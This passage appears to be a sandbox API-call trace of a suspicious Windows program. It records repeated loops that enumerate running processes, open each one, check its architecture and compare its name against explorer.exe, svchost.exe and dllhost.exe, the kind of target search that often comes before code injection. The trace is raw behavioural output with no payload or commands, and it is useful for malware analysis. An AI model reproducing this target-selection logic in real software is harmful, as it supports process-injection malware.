Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.706] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.706] CloseHandle (hObject=0xec) returned 1 [0240.706] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0240.706] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0240.706] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0240.706] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0240.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0240.706] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.707] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.707] CloseHandle (hObject=0xec) returned 1 [0240.707] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0240.707] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0240.707] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0240.707] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0240.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0240.707] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.707] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.707] CloseHandle (hObject=0xec) returned 1 [0240.707] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0240.707] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0240.707] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0240.707] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0240.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0240.708] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.708] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.708] CloseHandle (hObject=0xec) returned 1 [0240.708] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0240.708] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0240.708] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0240.708] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0240.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0240.709] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.709] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.709] CloseHandle (hObject=0xec) returned 1 [0240.709] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0240.709] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0240.709] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0240.709] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0240.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0240.709] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.709] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.709] CloseHandle (hObject=0xec) returned 1 [0240.709] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0240.709] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0240.709] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0240.709] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0240.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0240.710] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.710] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.710] CloseHandle (hObject=0xec) returned 1 [0240.710] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0240.710] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0240.710] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0240.710] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0240.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0240.711] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.711] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.711] CloseHandle (hObject=0xec) returned 1 [0240.711] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0240.711] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0240.711] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0240.711] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0240.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0240.711] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.711] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.711] CloseHandle (hObject=0xec) returned 1 [0240.711] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0240.711] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0240.711] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0240.711] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0240.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0240.712] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.712] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.712] CloseHandle (hObject=0xec) returned 1 [0240.712] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0240.712] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0240.712] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0240.712] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0240.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0240.713] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.713] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.713] CloseHandle (hObject=0xec) returned 1 [0240.713] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0240.713] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0240.713] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0240.713] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0240.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0240.713] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.713] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.713] CloseHandle (hObject=0xec) returned 1 [0240.713] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0240.713] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0240.713] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0240.713] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0240.714] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0240.714] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0240.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0240.715] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0240.715] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0240.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0240.716] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0240.717] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.717] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.717] CloseHandle (hObject=0xec) returned 1 [0240.717] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0240.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0240.717] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.717] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.717] CloseHandle (hObject=0xec) returned 1 [0240.717] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0240.718] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0240.718] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.718] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.718] CloseHandle (hObject=0xec) returned 1 [0240.718] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0240.718] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0240.719] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.719] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.719] CloseHandle (hObject=0xec) returned 1 [0240.719] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.719] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0240.720] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.720] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.720] CloseHandle (hObject=0xec) returned 1 [0240.720] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0240.721] CloseHandle (hObject=0xe8) returned 1 [0240.721] Sleep (dwMilliseconds=0x3e8) [0241.731] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0241.733] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0241.734] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0241.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0241.734] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0241.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0241.735] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0241.735] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0241.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0241.736] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0241.736] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0241.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0241.737] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0241.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0241.737] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0241.738] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0241.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0241.738] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0241.739] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0241.739] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0241.740] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0241.740] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0241.741] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0241.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0241.741] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0241.742] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0241.742] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0241.743] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.743] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.743] CloseHandle (hObject=0xec) returned 1 [0241.743] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0241.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0241.743] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0241.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0241.744] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.744] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.744] CloseHandle 